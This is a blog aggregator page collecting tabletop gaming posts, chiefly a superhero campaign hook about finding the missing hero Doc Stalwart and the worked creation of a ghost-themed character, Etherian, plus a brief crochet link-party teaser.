I've  been quietly cracking open my first edition Advanced Dungeons & Dragons Monster Manual & looking into the devils section last night. I looked into the Erinyes entry  for a bit of Sword & Sorcery inspiration.The Monster Manual & even the original Dungeons & Dragons monster stats profile has been lacking. Greco Roman mythology is so much richer on these goddesses & children of Chronos's Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Campaign Hook and Some Character Building

The Splintered Realm - Wed, 05/06/2020 - 01:37
Mikah the Chronicle opened a filing cabinet. It was amazing he knew which one. There were hundreds - no, thousands - of filing cabinets here. They sat in rows and rows, each filled (presumably) with file folders. Mikah the Chronicle produced one. He handed it to you. You read the label: “Last Known Location of Doc Stalwart.”
Campaign Hook: The Search for Doc Stalwart
At the end of the Stalwart Age, Doc Stalwart was the greatest hero in the world. He had overcome incredible challenges, defeating many of the most powerful villains in the world. And then, at the height of his fame and success, he disappeared.
That was twenty years ago. Eventually, people accepted that he was gone. Probably dead. Maybe at the bottom of the sea. Or at the edges of the solar system. Or in a far-off dimension beyond mortal reach. But now, he’s alive. Several mentalists have felt his presence in the world. 
The campaign is a loosely-connected series of location adventures wherein the heroes undertake a quest to find Doc Stalwart. As they go, they may amass clues that will allow them to find him and restore him to life. Or, maybe they won’t.
My idea right now is that I am going to write the adventure locations one at a time, and plant a seed in each one about the quest for Doc. I am going to make a character to maybe play test with...
Judah Jynx. The son of the ghost Zirah - Judah has supernatural powers.  I'm thinking a ghost as the character theme.
Let’s see what I get from random rolling:
Altered human. +1 to one attribute, +1 Feat rating.
4 Traits:StunInvisibilitySwinglinePhasing
He’s like the invisible girl, but with a stun instead of the telekinesis. Hm. I need some way to do damage (right?) I don’t really like invisibility or swingline, but I’d rather have teleport. Actually, I am going to swap invisibility and swingline for blink. So, I have stun, blink, and phasing. I’m sort of a proto-vision kind of character. Definitely works with my ghost theme.
I’m going to take a drawback and pick up one other trait… not sure what. I need a way to deal damage, so I’m thinking a weapon of some kind (a sword like his mom?) He doesn’t need the sword - he is bound to the realm, unlike his mom - but he THINKS he does. He has panic attacks when the sword is not on him. 
He will take melee weapon, sword, with his bonus trait. So, he has:
Stun, Phasing, Blink, Melee Weapon
Rolling for attributes:
12, 14, 15, 12, 13, 12
Wow did I roll really well! I’d like to bump up that 15 to a 16, and while it doesn’t make sense to drop 12s, I don’t need secondary attributes that high. I’m actually going to drop the two 12s all the way to 10, giving me 2 points; I bump the 15 to 16, and the 13 to 14. Noice. I arrange as follows:
STR 12 (+3); INT 10 (+2); PWR 16 (+5)DEX 14 (+4); CON 14 (+4); CHA 10 (+2)
For hit points, I roll 12 (I rerolled a 2 and got 6). That gives me 16 starting hit points.My Feat modifier is +8.My talent will be enemy (?) I don’t see this character having an enemy, but I guess he would… sure… hmm. Have to think on that more.
Armor class is going to be 15. 
I have to do some math on my traits:My sword deals base 1d8 damage. Happy with that. It cannot be thrown (and if it could be, he wouldn’t; he’s got that anxiety about being separated from it, so intentionally winging it at someone else in combat doesn’t make much sense).When I phase, I’m going to take +5 to AC (bumping it to 20), get +5 to hit and damage with my sword (instead of the +3 I get normally), and I can attempt a PWR check to move through solid objects. Dang that’s nice… I extend this to my blade (of course) which partially phases with me (or which channels some of my natural energy; something like that).I have a stunning glare (to 90’) that forces a target once per turn to attempt a Feat (DT 25) or be stunned for 1d6 rounds. Nice.
He’s going to be a hero, and his purpose is going to be to honor his mother (who is trapped in the Shadow Realm, and is only accessed via a special mirror). He was born in the shadow realm, but then was brought over. I was going to go with his name (Judah Jynx) for his moniker, but I looked up ghost in the thesaurus and found Ether. I modified that for a moniker. And, reviewing my notes, I see that I forgot a +1 to one attribute. Oops. I throw that into DEX.
EtherianJudah Jynx; Hero 1AC 15 (20 phased); hp 16; Feat +8; Sword (+4/1d8+4 -or- +6/1d8+6 while phased)STR 12 (+3); INT 10 (+2); PWR 16 (+5)DEX 15 (+4); CON 14 (+4); CHA 10 (+2)Enemy: The Shadow King Asigoth (and his servants)Blink (as a free action, up to 160’, 5x per turn)Phasing (one action once per turn; PWR check)Stun (one action; force target within 90’ to attempt Feat CR 25 or stunned 1d6 rounds)
I wanted a character a little bit like Nightcrawler; I think I have him. He’s definitely different, but he makes sense. 
About the Shadow Realm (also called the Vale of Shadows): This is a mystical dimension of dark energy. It is controlled by the Shadow King Asigoth, who seeks to cross over into our realm and touch all corners with shadow. His efforts were stopped by Zirah, who intentionally made herself a barrier between lands, preventing him from crossing over. 

Hookin On Hump Day #214: A Yarny Link Party!

Moogly - Wed, 05/06/2020 - 01:00

Hookin On Hump Day is here with another wonderful collection of knit and crochet patterns for you! Get all the links, and check out the new entries below – there’s so much wonderful stuff out there! What is Hookin On Hump Day? Hookin On Hump Day is a knit and crochet link party hosted here...

Read More

The post Hookin On Hump Day #214: A Yarny Link Party! appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

Categories: Crochet Life


Subscribe to Furiously Eclectic People aggregator